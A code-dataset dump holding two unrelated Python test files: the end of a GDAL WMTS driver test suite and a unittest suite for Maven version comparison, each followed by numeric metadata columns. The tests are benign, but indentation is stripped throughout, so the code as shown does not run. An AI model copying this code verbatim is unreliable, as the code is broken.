<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_19.xml"/>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/wmts_19.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 512:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
if ds.RasterYSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterYSize)
return 'fail'
got_gt = ds.GetGeoTransform()
expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
for i in range(6):
if abs(got_gt[i] - expected_gt[i]) > 1e-8:
gdaltest.post_reason('fail')
print(got_gt)
return 'fail'
if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'fail'
return 'success'
###############################################################################
# AOI from layer BoundingBox but restricted with TileMatrixSetLimits
def wmts_20():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/wmts_20.xml', """<Capabilities>
<Contents>
<Layer>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG::4326">
<ows:LowerCorner>-90 -180</ows:LowerCorner>
<ows:UpperCorner>90 180</ows:UpperCorner>
</ows:BoundingBox>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
<TileMatrixSetLimits>
<TileMatrixLimits>
<TileMatrix>GoogleCRS84Quad:2</TileMatrix>
<MinTileRow>0</MinTileRow>
<MaxTileRow>0</MaxTileRow>
<MinTileCol>1</MinTileCol>
<MaxTileCol>2</MaxTileCol>
</TileMatrixLimits>
</TileMatrixSetLimits>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_20.xml"/>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/wmts_20.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 512:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
if ds.RasterYSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterYSize)
return 'fail'
got_gt = ds.GetGeoTransform()
expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
for i in range(6):
if abs(got_gt[i] - expected_gt[i]) > 1e-8:
gdaltest.post_reason('fail')
print(got_gt)
return 'fail'
if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'fail'
return 'success'
###############################################################################
# Test ExtendBeyondDateLine
def wmts_21():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/wmts_21.xml', """<Capabilities>
<Contents>
<Layer>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG::4326">
<ows:LowerCorner>-90 -180</ows:LowerCorner>
<ows:UpperCorner>0 180</ows:UpperCorner>
</ows:BoundingBox>
<!-- completely made-up case and not really representative... -->
<ows:BoundingBox crs="urn:ogc:def:crs:OGC:2:84">
<ows:LowerCorner>90 -90</ows:LowerCorner>
<ows:UpperCorner>-90 0</ows:UpperCorner>
</ows:BoundingBox>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<ResourceURL format="image/png"
template="/vsimem/wmts_21/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_21.xml"/>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/wmts_21.xml,extendbeyonddateline=yes')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 512:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
if ds.RasterYSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterYSize)
return 'fail'
got_gt = ds.GetGeoTransform()
expected_gt = (90, 0.3515625, 0.0, 0.0, 0.0, -0.3515625)
for i in range(6):
if abs(got_gt[i] - expected_gt[i]) > 1e-8:
gdaltest.post_reason('fail')
print(got_gt)
return 'fail'
if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'fail'
tmp_ds = gdal.GetDriverByName('MEM').Create('',256,256,4)
for i in range(4):
tmp_ds.GetRasterBand(i+1).Fill(64)
tmp3_ds = gdal.GetDriverByName('PNG').CreateCopy('/vsimem/wmts_21/default_style/tms/GoogleCRS84Quad:2/1/3.png', tmp_ds)
tmp_ds = gdal.GetDriverByName('MEM').Create('',256,256,4)
for i in range(4):
tmp_ds.GetRasterBand(i+1).Fill(128)
tmp0_ds = gdal.GetDriverByName('PNG').CreateCopy('/vsimem/wmts_21/default_style/tms/GoogleCRS84Quad:2/1/0.png', tmp_ds)
if ds.GetRasterBand(1).ReadRaster(0,0,256,256) != tmp3_ds.GetRasterBand(1).ReadRaster(0,0,256,256):
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).ReadRaster(256,0,256,256) != tmp0_ds.GetRasterBand(1).ReadRaster(0,0,256,256):
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Test when WGS84BoundingBox is a densified reprojection of the tile matrix bbox
def wmts_22():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/wmts_22.xml', """<Capabilities>
<Contents>
<Layer>
<ows:WGS84BoundingBox>
<ows:LowerCorner>-6.38153862706 55.6179644952</ows:LowerCorner>
<ows:UpperCorner>60.3815386271 75.5825702342</ows:UpperCorner>
</ows:WGS84BoundingBox>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>tms</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::3067</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>13</ows:Identifier>
<ScaleDenominator>3571.42857143</ScaleDenominator>
<TopLeftCorner>-548576.0 8388608.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>8192</MatrixWidth>
<MatrixHeight>8192</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_22.xml"/>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/wmts_22.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 2097152:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
if ds.RasterYSize != 2097152:
gdaltest.post_reason('fail')
print(ds.RasterYSize)
return 'fail'
got_gt = ds.GetGeoTransform()
expected_gt = (-548576.0, 1.0000000000004, 0.0, 8388608.0, 0.0, -1.0000000000004)
for i in range(6):
if abs(got_gt[i] - expected_gt[i]) > 1e-8:
gdaltest.post_reason('fail')
print(got_gt)
return 'fail'
if ds.GetProjectionRef().find('3067') < 0:
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'fail'
return 'success'
###############################################################################
#
def wmts_23( imagetype, expected_cs ):
if gdaltest.wmts_drv is None:
return 'skip'
inputXml = '/vsimem/' + imagetype +'.xml'
serviceUrl = '/vsimem/wmts_23/' + imagetype
gdal.FileFromMemBuffer( inputXml, """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template=" """ + serviceUrl + """/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>128</TileWidth>
<TileHeight>128</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>""")
tmp_ds = gdal.Open( 'data/wms/' + imagetype + '.png' )
if tmp_ds is None:
gdaltest.post_reason('fail - cannot open tmp_ds')
return 'fail'
tile0_ds = gdal.GetDriverByName('PNG').CreateCopy(serviceUrl + '/0/0/0.png', tmp_ds )
if tile0_ds is None:
gdaltest.post_reason('fail - cannot create tile0')
return 'fail'
ds = gdal.Open('WMTS:' + inputXml )
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 128:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
if ds.RasterYSize != 128:
gdaltest.post_reason('fail')
print(ds.RasterYSize)
return 'fail'
for i in range(4):
cs = ds.GetRasterBand( i + 1 ).Checksum()
if cs != expected_cs[i]:
gdaltest.post_reason('fail')
print( cs )
return 'fail'
return 'success'
def wmts_23_gray():
return wmts_23( 'gray', [ 60137, 60137, 60137, 4428 ] )
def wmts_23_grayalpha():
return wmts_23( 'gray+alpha', [ 39910, 39910, 39910, 63180 ] )
def wmts_23_pal():
return wmts_23( 'pal', [ 62950, 59100, 63864, 453 ] )
def wmts_23_rgb():
return wmts_23( 'rgb', [ 1020, 3665, 6180, 4428 ] )
def wmts_23_rgba():
return wmts_23( 'rgba', [ 65530, 51449, 1361, 59291 ] )
###############################################################################
#
def wmts_CleanCache():
hexstr = '012346789abcdef'
for i in range(len(hexstr)):
for j in range(len(hexstr)):
lst = gdal.ReadDir('/vsimem/cache/%s/%s' % (i, j))
if lst is not None:
for f in lst:
gdal.Unlink('/vsimem/cache/%s/%s/%s' % (i, j, f))
###############################################################################
#
def wmts_cleanup():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.SetConfigOption('CPL_CURL_ENABLE_VSIMEM', None)
gdal.SetConfigOption('GDAL_DEFAULT_WMS_CACHE_PATH', None)
wmts_CleanCache()
lst = gdal.ReadDir('/vsimem/')
if lst:
for f in lst:
gdal.Unlink('/vsimem/' + f)
try:
shutil.rmtree('tmp/wmts_cache')
except:
pass
return 'success'
gdaltest_list = [
wmts_1,
wmts_2,
wmts_3,
wmts_4,
wmts_5,
wmts_6,
wmts_7,
wmts_8,
wmts_9,
wmts_10,
wmts_11,
wmts_12,
wmts_12bis,
wmts_13,
wmts_14,
wmts_15,
wmts_16,
wmts_17,
wmts_18,
wmts_19,
wmts_20,
wmts_21,
wmts_22,
wmts_23_gray,
wmts_23_grayalpha,
wmts_23_pal,
wmts_23_rgb,
wmts_23_rgba,
wmts_cleanup ]
if __name__ == '__main__':
gdaltest.setup_run( 'wmts' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| 35.469184
| 244
| 0.569333
| 6,223
| 63,880
| 5.76619
| 0.075044
| 0.036452
| 0.054678
| 0.066828
| 0.865201
| 0.845024
| 0.835187
| 0.811582
| 0.783658
| 0.758576
| 0
| 0.060824
| 0.26855
| 63,880
| 1,800
| 245
| 35.488889
| 0.707138
| 0.032044
| 0
| 0.810972
| 0
| 0.020489
| 0.619486
| 0.304448
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020489
| false
| 0.000661
| 0.002644
| 0.003305
| 0.131527
| 0.033708
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ace6881b8d6091641ff24c5aaeb39c71fc32036
| 10,752
|
py
|
Python
|
test/mavenversioncmptest.py
|
pausan/python-maven
|
97b8735170de2f67dcb557afdfdb271cce335d42
|
[
"MIT"
] | null | null | null |
test/mavenversioncmptest.py
|
pausan/python-maven
|
97b8735170de2f67dcb557afdfdb271cce335d42
|
[
"MIT"
] | null | null | null |
test/mavenversioncmptest.py
|
pausan/python-maven
|
97b8735170de2f67dcb557afdfdb271cce335d42
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os,sys
import unittest
sys.path.append (os.path.join (os.path.dirname (__file__), '..'))
from mavencoord import MavenCoord
import mavenversioncmp as vercmp
class MavenVersionCompareTest (unittest.TestCase):
def testGetCanonical (self):
(major, minor, rev, qualifier, build) = vercmp.getCanonical ('')
self.assertEquals (major, 0)
self.assertEquals (minor, 0)
self.assertEquals (rev, 0)
self.assertEquals (qualifier, '')
self.assertEquals (build, 0)
(major, minor, rev, qualifier, build) = vercmp.getCanonical ('1.2')
self.assertEquals (major, 1)
self.assertEquals (minor, 2)
self.assertEquals (rev, 0)
self.assertEquals (qualifier, '')
self.assertEquals (build, 0)
(major, minor, rev, qualifier, build) = vercmp.getCanonical ('121.2.78')
self.assertEquals (major, 121)
self.assertEquals (minor, 2)
self.assertEquals (rev, 78)
self.assertEquals (qualifier, '')
self.assertEquals (build, 0)
(major, minor, rev, qualifier, build) = vercmp.getCanonical ('121.2.78-SNAPSHOT')
self.assertEquals (major, 121)
self.assertEquals (minor, 2)
self.assertEquals (rev, 78)
self.assertEquals (qualifier, 'snapshot')
self.assertEquals (build, 0)
(major, minor, rev, qualifier, build) = vercmp.getCanonical ('44.33.22-ReLeASe-9901')
self.assertEquals (major, 44)
self.assertEquals (minor, 33)
self.assertEquals (rev, 22)
self.assertEquals (qualifier, 'release')
self.assertEquals (build, 9901)
return
def testCompare (self):
self.assertEquals (vercmp.compare ('', ''), 0)
self.assertEquals (vercmp.compare ('', '0.0'), 0)
self.assertEquals (vercmp.compare ('', '0.0.0--0'), 0)
self.assertTrue (vercmp.compare ('', '1') < 0)
self.assertTrue (vercmp.compare ('1', '0') > 0)
self.assertTrue (vercmp.compare ('1.3.2', '2.1.1') < 0)
self.assertTrue (vercmp.compare ('1.3.2', '1.4.0') < 0)
self.assertTrue (vercmp.compare ('1.3.2', '1.3.3') < 0)
self.assertTrue (vercmp.compare ('2.1.1', '1.3.2') > 0)
self.assertTrue (vercmp.compare ('1.4.0', '1.3.2') > 0)
self.assertTrue (vercmp.compare ('1.3.3', '1.3.2') > 0)
self.assertTrue (vercmp.compare ('1.3', '1.2]') > 0)
return
def testSatisfiesMinimum (self):
self.assertFalse (vercmp.satisfies ("1.2", "1.3"))
self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "12.1.2-a-1"))
self.assertTrue (vercmp.satisfies ("1.3", "1.2"))
self.assertTrue (vercmp.satisfies ("12.1.2-2-0", "12.1.2-2-0"))
self.assertTrue (vercmp.satisfies ("1.2.3-RELEASE", "1.2.3-RELEASE"))
self.assertFalse (vercmp.satisfies ("1.2", "[1.3,]"))
self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "[12.1.2-a-1,]"))
self.assertFalse (vercmp.satisfies ("1.3", "[1.4,]"))
self.assertTrue (vercmp.satisfies ("1.3", "[1.2,]"))
self.assertTrue (vercmp.satisfies ("12.1.2-2-0", "[12.1.2-2-0,]"))
self.assertTrue (vercmp.satisfies ("1.2.3-RELEASE", "[1.2.3-RELEASE,]"))
self.assertFalse (vercmp.satisfies ("1.2", "(1.3,)"))
self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "(12.1.2-a-1,)"))
self.assertFalse (vercmp.satisfies ("1.3", "(1.4,)"))
self.assertTrue (vercmp.satisfies ("1.3", "(1.2,)"))
self.assertFalse (vercmp.satisfies ("12.1.2-2-0", "(12.1.2-2-0,)"))
self.assertFalse (vercmp.satisfies ("1.2.3-RELEASE", "(1.2.3-RELEASE,)"))
return
def testSatisfiesMaximum (self):
self.assertTrue (vercmp.satisfies ("1.2", "[,1.3]"))
self.assertTrue (vercmp.satisfies ("12.1.2-a-0", "[,12.1.2-a-1]"))
self.assertFalse (vercmp.satisfies ("1.3", "[,1.2]"))
self.assertTrue (vercmp.satisfies ("1.3", "[,1.4]"))
self.assertTrue (vercmp.satisfies ("12.1.2-2-0", "[,12.1.2-2-0]"))
self.assertTrue (vercmp.satisfies ("1.2.3-RELEASE", "[,1.2.3-RELEASE]"))
self.assertTrue (vercmp.satisfies ("1.2", "(,1.3)"))
self.assertTrue (vercmp.satisfies ("12.1.2-a-0", "(,12.1.2-a-1)"))
self.assertFalse (vercmp.satisfies ("1.3", "(,1.2)"))
self.assertTrue (vercmp.satisfies ("1.3", "(,1.4)"))
self.assertFalse (vercmp.satisfies ("12.1.2-2-0", "(,12.1.2-2-0)"))
self.assertFalse (vercmp.satisfies ("1.2.3-RELEASE", "(,1.2.3-RELEASE)"))
return
def testSatisfiesMinimumExclusive (self):
# >=
self.assertFalse (vercmp.satisfies ("1.2", "(1.3,)"))
self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "(12.1.2-a-1,)"))
self.assertTrue (vercmp.satisfies ("1.2.4.2", "(1.2,)"))
self.assertFalse (vercmp.satisfies ("1.2", "(1.2,)"))
self.assertFalse (vercmp.satisfies ("12.1.2-2-0", "(12.1.2-2-0,)"))
self.assertFalse (vercmp.satisfies ("1.2.3-RELEASE", "(1.2.3-RELEASE,)"))
return
def testSatisfiesExact (self):
self.assertFalse (vercmp.satisfies ("1.2", "[1.3]"))
self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "[12.1.2-a-1]"))
self.assertFalse (vercmp.satisfies ("1.3", "[1.2]"))
self.assertTrue (vercmp.satisfies ("12.1.2-2-0", "[12.1.2-2-0]"))
self.assertTrue (vercmp.satisfies ("1.2.3-RELEASE", "[1.2.3-RELEASE]"))
return
def testSatisfiesRangeInclusive (self):
self.assertTrue (vercmp.satisfies ("1.1.4-asdf-23", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertTrue (vercmp.satisfies ("1.1.4-asdf-42", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-22", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-43", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertTrue (vercmp.satisfies ("1.1.4-zzzz-22", "[1.1.4-asdf-23, 1.1.5-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-43", "[1.1.4-asdf-23, 1.1.5-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-23", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdg-23", "[1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1", "[1.2,1.3]"))
self.assertTrue (vercmp.satisfies ("1.2", "[1.2,1.3]"))
self.assertTrue (vercmp.satisfies ("1.2.5", "[1.2,1.3]"))
self.assertTrue (vercmp.satisfies ("1.3", "[1.2,1.3]"))
self.assertFalse (vercmp.satisfies ("1.4", "[1.2,1.3]"))
return
def testSatisfiesRangeExclusiveStart (self):
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-23", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertTrue (vercmp.satisfies ("1.1.4-asdf-42", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-22", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-43", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertTrue (vercmp.satisfies ("1.1.4-zzzz-22", "(1.1.4-asdf-23, 1.1.5-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-43", "(1.1.4-asdf-23, 1.1.5-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-23", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdg-23", "(1.1.4-asdf-23, 1.1.4-asdf-42]"))
self.assertFalse (vercmp.satisfies ("1.1", "(1.2,1.3]"))
self.assertFalse (vercmp.satisfies ("1.2", "(1.2,1.3]"))
self.assertTrue (vercmp.satisfies ("1.2.5", "(1.2,1.3]"))
self.assertTrue (vercmp.satisfies ("1.3", "(1.2,1.3]"))
self.assertFalse (vercmp.satisfies ("1.4", "(1.2,1.3]"))
return
def testSatisfiesRangeExclusiveEnd (self):
self.assertTrue (vercmp.satisfies ("1.1.4-asdf-23", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-42", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-22", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-43", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertTrue (vercmp.satisfies ("1.1.4-zzzz-22", "[1.1.4-asdf-23, 1.1.5-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-43", "[1.1.4-asdf-23, 1.1.5-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-23", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdg-23", "[1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1", "[1.2,1.3)"))
self.assertTrue (vercmp.satisfies ("1.2", "[1.2,1.3)"))
self.assertTrue (vercmp.satisfies ("1.2.5", "[1.2,1.3)"))
self.assertFalse (vercmp.satisfies ("1.3", "[1.2,1.3)"))
self.assertFalse (vercmp.satisfies ("1.4", "[1.2,1.3)"))
return
def testSatisfiesRangeExclusive (self):
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-23", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-42", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-22", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdf-43", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertTrue (vercmp.satisfies ("1.1.4-zzzz-22", "(1.1.4-asdf-23, 1.1.5-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-43", "(1.1.4-asdf-23, 1.1.5-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-aaaa-23", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1.4-asdg-23", "(1.1.4-asdf-23, 1.1.4-asdf-42)"))
self.assertFalse (vercmp.satisfies ("1.1", "(1.2,1.3)"))
self.assertFalse (vercmp.satisfies ("1.2", "(1.2,1.3)"))
self.assertTrue (vercmp.satisfies ("1.2.0-something.0", "(1.2,1.3)"))
self.assertTrue (vercmp.satisfies ("1.2.5", "(1.2,1.3)"))
self.assertFalse (vercmp.satisfies ("1.3", "(1.2,1.3)"))
self.assertFalse (vercmp.satisfies ("1.4", "(1.2,1.3)"))
return
def testSatisfiesMultipleRanges (self):
self.assertTrue (vercmp.satisfies ("0.3", "(,1.0],[1.2,)"))
self.assertTrue (vercmp.satisfies ("1.0", "(,1.0],[1.2,)"))
self.assertFalse (vercmp.satisfies ("1.1", "(,1.0],[1.2,)"))
self.assertTrue (vercmp.satisfies ("1.2", "(,1.0],[1.2,)"))
self.assertTrue (vercmp.satisfies ("8.2", "(,1.0],[1.2,)"))
self.assertTrue (vercmp.satisfies ("0.3", "(,1.0),(1.2,)"))
self.assertFalse (vercmp.satisfies ("1.0", "(,1.0),(1.2,)"))
self.assertFalse (vercmp.satisfies ("1.1", "(,1.0),(1.2,)"))
self.assertFalse (vercmp.satisfies ("1.2", "(,1.0),(1.2,)"))
self.assertTrue (vercmp.satisfies ("8.2", "(,1.0),(1.2,)"))
return
def testSatisfiesWithSpaces (self):
self.assertTrue (vercmp.satisfies ("1.2", " ( , 1.3 ] "))
self.assertTrue (vercmp.satisfies ("1.3", "( ,1.3]"))
self.assertFalse (vercmp.satisfies ("1.4", "( , 1.3]"))
self.assertTrue (vercmp.satisfies ("1.2", "( , 1.3.5]"))
return
if __name__ == '__main__':
unittest.main()
| 46.951965
| 91
| 0.607701
| 1,734
| 10,752
| 3.761246
| 0.044406
| 0.034039
| 0.218338
| 0.077277
| 0.878718
| 0.869365
| 0.869212
| 0.849586
| 0.839466
| 0.797761
| 0
| 0.117782
| 0.146391
| 10,752
| 228
| 92
| 47.157895
| 0.592831
| 0.004278
| 0
| 0.209945
| 0
| 0.176796
| 0.251892
| 0.001962
| 0
| 0
| 0
| 0
| 0.79558
| 1
| 0.066298
| false
| 0
| 0.022099
| 0
| 0.160221
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
